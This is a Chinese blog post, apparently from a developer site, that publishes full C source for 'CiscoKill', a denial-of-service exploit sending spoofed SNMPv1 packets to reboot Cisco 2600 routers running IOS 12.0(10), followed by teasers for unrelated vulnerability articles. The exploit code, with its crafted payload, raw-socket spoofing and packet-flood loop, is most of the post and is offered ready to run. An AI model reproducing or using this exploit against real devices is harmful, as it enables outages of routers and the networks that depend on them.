SNMP协议实现存在多个漏洞的攻击代码

原创 2004年07月19日 16:29:00
攻击者在不知道"community string"的前提下,也能进行拒绝服务攻击。
以下这段代码将重启Cisco 2600路由器:

/* This program send a spoofed snmpv1 get request that cause system reboot
  on Cisco 2600 routers with IOS version 12.0(10)

  Author : kundera@tiscali.it ... don't be lame use for testing only! ..:) */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>



struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;

struct ip *IP;
struct udphdr *UDP;
int p_number=1,sok,datasize,i=0;

char *packet,*source,*target;
char *packetck;
char *data,c;

char snmpkill[] =
"/x30/x81/xaf/x02/x01/x00/x04/x06/x70/x75/x62/x6c/x69/x63/xa0/x81"
"/xa1/x02/x02/x09/x28/x02/x01/x00/x02/x01/x00/x30/x81/x94/x30/x81"
"/x91/x06/x81/x8c/x4d/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73/x25/x73"
"/x25/x73/x25/x73/x25/x73/x81/xff/xff/xff/xff/xff/xff/xff/xff/x7f"
"/x05";


struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;


in_cksum (unsigned short *ptr, int nbytes)
{

register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */

/*
  * Our algorithm is simple, using a 32-bit accumulator (sum),
  * we add sequential 16-bit words to it, and at the end, fold back
  * all the carry bits from the top 16 bits into the lower 16 bits.
  */

sum = 0;
while (nbytes > 1)
   {
    sum += *ptr++;
    nbytes -= 2;
   }

/* mop up an odd byte, if necessary */
if (nbytes == 1)
   {
    oddbyte = 0; /* make sure top half is zero */
    *((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */
    sum += oddbyte;
   }

/*
  * Add back carry outs from top 16 bits to low 16 bits.
  */

sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return (answer);
}


void usage (void)
{
printf("Kundera CiscoKill v1.0/n");
printf("Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target /n");
}



int main(int argc,char **argv){

if (argc < 2){
usage();
exit(1);
}

while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
switch(c) {
  case 's': source=optarg; break;
  case 'n': p_number=atoi(optarg); break;
  case 't': target=optarg;
  }
}

if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
printf("Can't create socket./n");
     exit(EXIT_FAILURE);
}

destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);

datasize=sizeof(snmpkill);

packet = ( char * )malloc( 20 + 8 + datasize );

IP = (struct ip *)packet;

memset(packet,0,sizeof(packet));
    
     IP->ip_dst.s_addr = destip_addr.s_addr;
     IP->ip_src.s_addr = sourceip_addr.s_addr;
     IP->ip_v = 4;
     IP->ip_hl = 5;
     IP->ip_ttl = 245;
     IP->ip_id = htons(666);
     IP->ip_p = 17;
     IP->ip_len = htons(20 + 8 + datasize);
     IP->ip_sum = in_cksum((u_short *)packet,20);


UDP = (struct udphdr *)(packet+20);
    UDP->source = htons(666);
    UDP->dest = htons(161);
    UDP->len = htons(8+datasize);
    UDP->check = 0;
    packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
    bzero(packetck,8 + datasize + sizeof(struct pseudoudp));
    psudp = (struct pseudoudp *) (packetck);
    psudp->ipdest = destip_addr.s_addr;
    psudp->ipsource = sourceip_addr.s_addr;
    psudp->zero = 0;
    psudp->proto = 17;
    psudp->length = htons(8+datasize);
    memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
    memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);

    UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));

data = (unsigned char *)(packet+20+8);
memcpy(data,snmpkill,datasize);
                                                                  
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;

while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet./n");
exit(EXIT_FAILURE);
}

i++;

}
printf("%d packets sent./n",i);

}

利用SNMP攻击思科等交换机路由器等设备

原理:某些交换机与路由器等设备会开启161端口的SNMP服务,有些设备采用默认的只读社区字符串:public与读写社区字符串:private或是其他较弱的社区字符串,这就使得我们可以以此来查看设备的实...
  • me23456
  • me23456
  • 2017年03月10日 17:10
  • 405

OpenSSL DROWN溺亡漏洞的检测及修复方法

一、漏洞描述: 现在流行的服务器和客户端使用TLS加密,SSL和TLS协议保证用户上网冲浪,购物,即时通信而不被第三方读取到。DROWN(溺亡)漏洞允许攻击者破坏这个加密体系,通过“中间人劫持攻击”读...
  • xuyaqun
  • xuyaqun
  • 2016年03月07日 09:43
  • 3824

Upnp协议漏洞和Linux堆溢出之fastbin

由于3年前的一个漏洞,今天仍然有610万台设备可被远程代码执行,包括智能手机、路由器、智能电视等,而且这个漏洞早在3年前就已经修复。 该漏洞存在于UPnP™设备的便携式SDK中,也叫做 li...
  • stonesharp
  • stonesharp
  • 2015年12月09日 10:38
  • 1223

web漏洞解决办法

通过绿盟软件检测到的问题
  • ApolloGG
  • ApolloGG
  • 2016年06月22日 15:00
  • 12941

SSL 3.0曝出Poodle漏洞的解决方案

SSL 3.0曝出高危漏洞 2014年10月15日,Google研究人员公布SSL 3.0协议存在一个非常严重的漏洞,该漏洞可被黑客用于截取浏览器与服务器之间进行传输的加密数据,如网银账号、邮箱账号...
  • Mrknowledge
  • Mrknowledge
  • 2015年05月26日 10:53
  • 1258

Android应用本地拒绝服务漏洞浅析

在对某个项目进行app应用安全评估时,被告知"  应用申明了多个可导出的Activity,可导致拒绝服务攻击",那到底什么是可导出的activity,拒绝服务攻击又是什么意思呢? 以下内容为转载,...
  • viviancheng666
  • viviancheng666
  • 2015年08月31日 13:49
  • 1445

Microsoft远程桌面协议RDP远程代码可执行漏洞(CVE-2012-0002)(MS12-020)

Microsoft 安全公告 MS12-020 - 严重 远程桌面中的漏洞可能允许远程执行代码 (2671387) 更新程序包 KB2621440 解决 CVE-2012-0002,更新程序包 KB2...
  • Pnoter
  • Pnoter
  • 2016年08月31日 18:38
  • 5234

WPA2协议新攻击方法(KRACK)—WPA2密钥重安装漏洞

Key Reinstallation Attacks Breaking WPA2 by forcing nonce reuse 今年9月份CCS公布了一篇新论文,该论文提出了一种新的攻击方法:...
  • jmh1996
  • jmh1996
  • 2017年10月18日 18:11
  • 1032

APP漏洞扫描器之本地拒绝服务检测详解

本文将讲一下应用漏洞扫描器在针对本地拒绝服务的检测方法。
  • AliMobileSecurity
  • AliMobileSecurity
  • 2016年10月24日 16:47
  • 1720

Fastjson存在远程代码执行高危安全漏洞

Fastjson安全漏洞通告
  • LC_shandow
  • LC_shandow
  • 2017年03月17日 19:14
  • 1933
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SNMP协议实现存在多个漏洞的攻击代码
举报原因:
原因补充:

(最多只允许输入30个字)